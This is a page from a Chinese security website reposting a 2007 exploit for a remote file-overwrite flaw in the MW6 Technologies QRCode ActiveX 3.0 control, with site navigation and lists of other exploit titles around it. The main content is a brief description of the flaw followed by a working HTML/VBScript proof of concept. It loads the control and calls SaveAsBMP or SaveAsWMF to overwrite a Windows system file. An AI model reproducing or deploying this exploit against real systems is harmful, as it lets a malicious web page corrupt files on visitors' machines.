首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MW6 Technologies QRCode ActiveX 3.0 Remote File Overwrite Exploit
来源: 作者:vf 发布时间:2007-09-19  
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
<b>MW6 Technologies QRCode ActiveX 3.0 (MW6QRCode.dll) Remote File Overwrite</b>
url: www.mw6tech.com

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

<b>Description:
This control contains two methods, "SaveAsBMP()" and "SaveAsWMF()", which
write to a file specified as an argument.
These can be exploited to overwrite and corrupt arbitrary files on the
system in the context of the currently logged-on user.

Marked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
KillBitSet: Falso</b>
-----------------------------------------------------------------------------
<object classid='clsid:3BB56637-651D-4D1D-AFA4-C0506F57EAF8' id='test' width='24' height='24'></object>

<select style="width: 404px" name="Pucca">
  <option value = "SaveAsBMP">SaveAsBMP</option>
  <option value = "SaveAsWMF">SaveAsWMF</option>

</select>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
Sub tryMe
  on error resume next
   Dim MyMsg
   if Pucca.value = "SaveAsBMP" then
     test.SaveAsBMP "c:\windows\system_.ini"
     MsgBox "Exploit completed."
   elseif Pucca.value = "SaveAsWMF" then
     test.SaveAsWMF "c:\windows\system_.ini"
     MsgBox "Exploit completed."
   end if
End Sub
</script>
</span></span>
</code></pre>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Shop-Script FREE <= 2.0 Remote
·Apple Quicktime /w IE .qtl Ver
·Omnistar Article Manager Softw
·phpBB Mod Ktauber.com StylesDe
·KwsPHP 1.0 stats Module Remote
·Airsensor M520 HTTPD Remote Pr
·KwsPHP 1.0 Member_Space Module
·jetAudio 7.x ActiveX DownloadF
·KwsPHP 1.0 (login.php) Remote
·Yahoo! Messenger 8.1.0.421 CYF
·Gelato (index.php post) Remote
·>Mercury/32 4.52 IMAPD SEARCH
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved